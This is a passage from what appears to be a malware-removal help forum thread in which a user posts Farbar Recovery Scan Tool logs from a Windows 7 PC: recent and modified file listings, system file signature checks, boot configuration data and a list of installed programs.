2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:03 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-12-20 23:30 - 2016-10-11 07:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-12-20 23:30 - 2016-10-11 07:03 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-12-20 23:30 - 2016-10-11 06:59 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-12-20 23:30 - 2016-10-11 06:59 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-12-20 23:30 - 2016-10-11 06:55 - 00346112 _____ (Microsoft Corporation) C:\Windows\system32\bcdedit.exe
2016-12-20 23:30 - 2016-10-11 06:55 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-12-20 23:30 - 2016-10-11 06:51 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-12-20 23:30 - 2016-10-11 06:51 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-12-20 23:30 - 2016-10-11 06:51 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-12-20 23:30 - 2016-10-11 06:51 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-12-20 23:30 - 2016-10-11 06:50 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 06:50 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 06:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 06:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 05:18 - 00419648 _____ C:\Windows\SysWOW64\locale.nls
2016-12-20 23:30 - 2016-10-11 05:17 - 00419648 _____ C:\Windows\system32\locale.nls
2016-12-20 23:30 - 2016-10-08 05:06 - 00633296 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2016-12-20 23:30 - 2016-10-04 07:31 - 01483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2016-12-20 23:30 - 2016-10-04 07:31 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2016-12-20 23:30 - 2016-10-04 07:31 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2016-12-20 23:30 - 2016-10-04 07:31 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2016-12-20 23:30 - 2016-10-04 07:13 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2016-12-20 23:30 - 2016-10-04 07:13 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2016-12-20 23:30 - 2016-10-04 07:13 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2016-12-20 23:30 - 2016-10-04 07:13 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2016-12-20 16:27 - 2016-12-20 16:27 - 00098642 _____ C:\Users\Owner\Desktop\skyrim iron helm crochet helmet.jpg
2016-12-18 19:25 - 2017-01-05 18:59 - 00000000 __SHD C:\Config.Msi
2016-12-15 08:51 - 2016-12-15 08:51 - 00000000 ____D C:\Users\Owner\AppData\Local\Chromium
2016-12-12 07:32 - 2016-12-12 07:32 - 00076568 _____ (BullGuard Ltd.) C:\Windows\system32\BGLsp.dll
2016-12-12 07:31 - 2016-12-12 07:31 - 00170168 _____ (BullGuard Ltd.) C:\Windows\system32\BgGamingMonitor.dll
2016-12-12 07:31 - 2016-12-12 07:31 - 00149032 _____ (BullGuard Ltd.) C:\Windows\SysWOW64\BgGamingMonitor.dll
2016-12-12 07:31 - 2016-12-12 07:31 - 00061720 _____ (BullGuard Ltd.) C:\Windows\SysWOW64\BGLsp.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-01-10 15:54 - 2015-12-22 21:54 - 00000908 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
2017-01-10 15:28 - 2015-12-22 21:36 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2017-01-10 13:48 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\inf
2017-01-10 03:09 - 2009-07-13 20:45 - 00021312 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-01-10 03:09 - 2009-07-13 20:45 - 00021312 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-01-10 02:10 - 2016-11-16 11:34 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\Mozilla
2017-01-10 02:00 - 2016-02-01 15:35 - 00000000 ____D C:\Users\Owner\AppData\Local\Adobe
2017-01-10 01:01 - 2016-02-01 16:43 - 00000000 ____D C:\Users\Owner\AppData\Local\Google
2017-01-10 00:59 - 2016-12-05 22:12 - 00000000 ____D C:\Users\Owner\Desktop\crochet and such
2017-01-10 00:50 - 2016-01-29 17:27 - 00000000 ____D C:\ProgramData\softthinks
2017-01-10 00:49 - 2015-12-22 21:49 - 00000000 ____D C:\Program Files (x86)\Dell Backup and Recovery
2017-01-10 00:48 - 2016-02-12 08:41 - 00000000 ____D C:\Users\Owner\AppData\Local\CrashDumps
2017-01-10 00:48 - 2011-02-10 06:25 - 00000000 ____D C:\Windows\panther
2017-01-10 00:46 - 2009-07-13 21:13 - 00783606 _____ C:\Windows\system32\PerfStringBackup.INI
2017-01-10 00:43 - 2016-08-04 13:37 - 00000000 ___RD C:\Users\Owner\Dropbox
2017-01-10 00:42 - 2015-12-22 21:54 - 00000904 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
2017-01-10 00:42 - 2015-12-22 21:46 - 00000000 ____D C:\ProgramData\NVIDIA
2017-01-10 00:42 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-01-09 22:56 - 2016-02-04 13:37 - 00000000 ____D C:\Users\Owner\AppData\Local\Battle.net
2017-01-09 13:38 - 2016-02-11 18:42 - 00855530 _____ C:\Windows\ntbtlog.txt
2017-01-09 00:45 - 2015-12-22 21:50 - 00000000 ____D C:\Program Files\Common Files\AV
2017-01-09 00:43 - 2009-07-13 19:20 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2017-01-09 00:43 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\SysWOW64\GroupPolicy
2017-01-08 18:37 - 2016-10-02 00:54 - 00000000 ____D C:\Users\Owner\AppData\Local\c345b
2017-01-08 16:11 - 2015-12-22 21:36 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-01-08 16:11 - 2015-12-22 21:36 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-01-08 16:11 - 2015-12-22 21:36 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-01-08 16:11 - 2015-12-22 21:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-01-08 16:11 - 2015-12-22 21:36 - 00000000 ____D C:\Windows\system32\Macromed
2017-01-08 13:30 - 2016-02-11 15:21 - 00000000 ____D C:\Users\Owner\AppData\Local\ElevatedDiagnostics
2017-01-08 11:09 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\ModemLogs
2017-01-04 20:25 - 2016-01-29 17:22 - 00000000 ____D C:\Users\Owner\AppData\Roaming\Adobe
2017-01-04 19:40 - 2016-09-02 13:50 - 00000000 ____D C:\Users\Owner\Desktop\Textures and such
2017-01-03 14:57 - 2016-04-30 10:29 - 00000000 ____D C:\Program Files\Common Files\Apple
2017-01-01 18:13 - 2015-12-22 21:48 - 00000000 ____D C:\ProgramData\PCDr
2016-12-21 16:49 - 2015-12-22 21:54 - 00000000 ____D C:\Program Files (x86)\Dropbox
2016-12-21 11:59 - 2016-07-19 07:55 - 00000000 ____D C:\Windows\system32\MRT
2016-12-21 04:09 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\rescache
2016-12-21 03:28 - 2009-07-13 19:20 - 00000000 __RSD C:\Windows\assembly
2016-12-21 03:28 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\Microsoft.NET
2016-12-21 03:20 - 2009-07-13 20:45 - 04934400 _____ C:\Windows\system32\FNTCACHE.DAT
2016-12-21 03:20 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\winsxs
2016-12-21 03:19 - 2016-02-02 03:45 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-12-21 03:19 - 2016-02-02 03:45 - 00000000 ____D C:\Windows\system32\appraiser
2016-12-21 03:19 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\SysWOW64\en-US
2016-12-21 03:19 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\system32\en-US
2016-12-21 03:19 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\system32\Boot
2016-12-21 03:19 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\AppPatch
2016-12-21 03:19 - 2009-07-13 19:20 - 00000000 ____D C:\Program Files\Internet Explorer
2016-12-21 03:19 - 2009-07-13 19:20 - 00000000 ____D C:\Program Files (x86)\Internet Explorer
2016-12-21 03:02 - 2016-07-19 07:55 - 135632432 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-12-21 03:01 - 2011-02-10 06:33 - 00775728 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2016-12-21 03:00 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\system32\catroot2
2016-12-20 14:01 - 2016-10-01 13:17 - 00524288 ___SH C:\Windows\system32\config\components{13db9c22-881c-11e6-ae2e-64006a7c8e43}.TMContainer00000000000000000001.regtrans-ms
2016-12-18 19:25 - 2015-12-22 21:47 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2016-12-18 19:25 - 2015-12-22 21:45 - 00000000 ____D C:\Program Files\Dell
2016-12-16 15:21 - 2016-02-01 16:43 - 00003330 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-12-16 15:21 - 2016-02-01 16:43 - 00003202 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-12-16 15:21 - 2009-07-13 19:20 - 00000000 ___RD C:\Program Files (x86)
2016-12-16 15:21 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\Tasks
2016-12-15 09:21 - 2016-02-01 17:03 - 00002197 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-12-15 09:21 - 2016-02-01 17:03 - 00002185 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-12-15 08:51 - 2016-02-01 15:30 - 00000000 ____D C:\Users\Owner\AppData\Local\Steam
2016-12-15 08:48 - 2016-11-16 01:30 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-12-15 08:48 - 2016-02-01 19:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
 
==================== Files in the root of some directories =======
 
2016-05-05 04:39 - 2016-09-13 18:59 - 0000033 _____ () C:\Users\Owner\AppData\Roaming\AdobeWLCMCache.dat
2016-06-23 13:01 - 2015-09-25 01:21 - 0016800 _____ () C:\Users\Owner\AppData\Local\Z@!-3b495312-f55f-45c0-9281-2cc59bf18a1b.tmp
2016-06-23 13:01 - 2015-09-25 01:21 - 0015776 _____ () C:\Users\Owner\AppData\Local\Z@S!-c8699736-af5a-499d-bcba-33543711ac5a.tmp
2015-12-22 21:39 - 2015-12-22 21:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
==================== BCD ================================
 
Windows Boot Manager
--------------------
identifier              {bootmgr}
device                  partition=\Device\HarddiskVolume3
description             Windows Boot Manager
locale                  en-us
inherit                 {globalsettings}
default                 {current}
resumeobject            {2661b79b-a945-11e5-904b-64006a7c8e43}
displayorder            {current}
toolsdisplayorder       {memdiag}
timeout                 30
 
Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \Windows\system32\winload.exe
description             Windows 7
locale                  en-us
inherit                 {bootloadersettings}
recoverysequence        {2661b79d-a945-11e5-904b-64006a7c8e43}
recoveryenabled         Yes
osdevice                partition=C:
systemroot              \Windows
resumeobject            {2661b79b-a945-11e5-904b-64006a7c8e43}
nx                      OptIn
bootstatuspolicy        DisplayAllFailures
 
Windows Boot Loader
-------------------
identifier              {2661b79d-a945-11e5-904b-64006a7c8e43}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{2661b79e-a945-11e5-904b-64006a7c8e43}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
inherit                 {bootloadersettings}
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{2661b79e-a945-11e5-904b-64006a7c8e43}
systemroot              \windows
nx                      OptIn
winpe                   Yes
 
Resume from Hibernate
---------------------
identifier              {2661b79b-a945-11e5-904b-64006a7c8e43}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
filedevice              partition=C:
filepath                \hiberfil.sys
debugoptionenabled      No
 
Windows Memory Tester
---------------------
identifier              {memdiag}
device                  partition=\Device\HarddiskVolume3
path                    \boot\memtest.exe
description             Windows Memory Diagnostic
locale                  en-US
inherit                 {globalsettings}
badmemoryaccess         Yes
 
EMS Settings
------------
identifier              {emssettings}
bootems                 Yes
 
Debugger Settings
-----------------
identifier              {dbgsettings}
debugtype               Serial
debugport               1
baudrate                115200
 
RAM Defects
-----------
identifier              {badmemory}
 
Global Settings
---------------
identifier              {globalsettings}
inherit                 {dbgsettings}
                        {emssettings}
                        {badmemory}
 
Boot Loader Settings
--------------------
identifier              {bootloadersettings}
inherit                 {globalsettings}
                        {hypervisorsettings}
 
Hypervisor Settings
-------------------
identifier              {hypervisorsettings}
hypervisordebugtype     Serial
hypervisordebugport     1
hypervisorbaudrate      115200
 
Resume Loader Settings
----------------------
identifier              {resumeloadersettings}
inherit                 {globalsettings}
 
Device options
--------------
identifier              {2661b79e-a945-11e5-904b-64006a7c8e43}
description             Ramdisk Options
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi
 
 
LastRegBack: 2017-01-03 00:04
 
==================== End of FRST.txt ============================


#13 RedArach

RedArach
  • Topic Starter

  • Members
  • 24 posts
  • OFFLINE
  •  

Posted 10 January 2017 - 07:14 PM

dditional scan result of Farbar Recovery Scan Tool (x64) Version: 08-01-2017
Ran by Owner (10-01-2017 16:08:50)
Running from C:\Users\Owner\Downloads
Windows 7 Professional Service Pack 1 (X64) (2016-01-30 01:19:55)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1863785947-2063213224-1850305329-500 - Administrator - Disabled)
Guest (S-1-5-21-1863785947-2063213224-1850305329-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1863785947-2063213224-1850305329-1002 - Limited - Enabled)
Owner (S-1-5-21-1863785947-2063213224-1850305329-1000 - Administrator - Enabled) => C:\Users\Owner
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: BullGuard Antivirus (Enabled - Up to date) {EDBB5818-2352-E06B-028A-4E6873B92CC5}
AV: Avast Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: BullGuard Antispyware (Enabled - Up to date) {56DAB9FC-0568-EFE5-383A-751A083E6678}
AS: Avast Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: BullGuard Firewall (Enabled) {D580D93D-693D-E133-29D5-E75D8D6A6BBE}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe After Effects CC 2014 (HKLM-x32\...\{2B22C750-5C3B-4738-B621-BA786AC7A494}) (Version: 13.2.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)
Adobe Flash Player 24 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Adobe Fuse CC (Preview) (HKLM-x32\...\{06F1F289-ACFE-43A2-A654-7950079D6685}) (Version: 1.0 - Adobe Systems Incorporated)
Adobe Illustrator CC 2015.3 (HKLM-x32\...\ILST_20_1_0) (Version: 20.1.0 - Adobe Systems Incorporated)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.7 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_4_0) (Version: 10.4.0 - Adobe Systems Incorporated)
Adobe Photoshop CC 2015.5 (HKLM-x32\...\PHSP_17_0_1) (Version: 17.0.1 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.17)  MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.17 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader Driver  (HKLM-x32\...\InstallShield_{E9D8E2D2-4928-437D-ADC6-2EFA7B678FC3}) (Version: 18.5.1844.33907 - Alcor Micro Corp.)
Alcor Micro USB Card Reader Driver  (x32 Version: 18.5.1844.33907 - Alcor Micro Corp.) Hidden
Ansel (Version: 368.81 - NVIDIA Corporation) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{D079CAAD-0C31-47A2-9AF5-A82F9CD9B221}) (Version: 5.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{64E6007B-1DA9-42CD-BBE4-D5FA67A7C71D}) (Version: 5.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 12.3.2280 - AVAST Software)
Blender (HKLM\...\{47A0EA10-D506-4473-AE99-5E07DD1062DE}) (Version: 2.77.1 - Blender Foundation)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Borderlands 2 (HKLM\...\Steam App 49520) (Version:  - Gearbox Software)
BullGuard Premium Protection (HKLM\...\BullGuard) (Version: 16.0 - BullGuard Ltd.)
CameraHelperMsi (x32 Version: 13.51.815.0 - Logitech) Hidden
Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Dead by Daylight: BETA (HKLM\...\Steam App 471230) (Version:  - )
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.8.0.66 - Dell Inc.)
Dell Data Vault (Version: 4.3.9.0 - Dell Inc.) Hidden
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F127834}) (Version: 3.4.15000.0 - Dell Inc.)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.3.6855.61 - Dell)
Dell SupportAssistAgent (HKLM-x32\...\{27130E51-9555-408B-8134-7BFF54EDE27B}) (Version: 1.3.0.72 - Dell)
Dell System Detect (HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\58d94f3ce2c27db0) (Version: 6.12.0.5 - Dell)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Dino D-Day (HKLM-x32\...\Steam App 70000) (Version:  - 800 North and Digital Ranch)
Discord (HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\Discord) (Version: 0.0.296 - Hammer & Chisel, Inc.)
Dropbox (HKLM-x32\...\Dropbox) (Version: 16.4.30 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
DW WLAN Card Utility (HKLM\...\DW WLAN Card Utility) (Version: 6.30.223.262 - Dell Inc.)
erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
ERUNT 1.1j (HKLM-x32\...\ERUNT_is1) (Version:  - Lars Hederer)
FINAL FANTASY XIV - A Realm Reborn (HKLM-x32\...\{2B41E132-07DF-4925-A3D3-F2D1765CCDFE}) (Version: 1.0.0000 - SQUARE ENIX CO., LTD.)
Goat Simulator (HKLM-x32\...\Steam App 265930) (Version:  - Coffee Stain Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.21.169 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.5.0.1165 - Citrix Systems, Inc.)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
iCloud (HKLM\...\{4BB313CE-D3D1-424C-8823-15CF85B00B05}) (Version: 6.1.0.30 - Apple Inc.)
Intel® Chipset Device Software (x32 Version: 10.1.1.13 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1167 - Intel Corporation)
Intel® Network Connections 20.2.3001.0 (HKLM\...\PROSetDX) (Version: 20.2.3001.0 - Intel)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 4.0.0.36 - Intel Corporation)
iTunes (HKLM\...\{81C96689-EA5B-4B7D-A04F-16326EC51BC2}) (Version: 12.5.4.42 - Apple Inc.)
Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.51 - Logitech Inc.)
Malwarebytes version 3.0.5.1299 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.5.1299 - Malwarebytes)
Maxx Audio Installer (x64) (Version: 2.6.6073.1 - Waves Audio Ltd.) Hidden
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4693.1005 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
Mozilla Firefox 50.1.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 en-US)) (Version: 50.1.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0.6186 - Mozilla)
Nik Collection (HKLM-x32\...\Nik Collection) (Version: 1.2.11 - Google)
NVIDIA 3D Vision Controller Driver 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
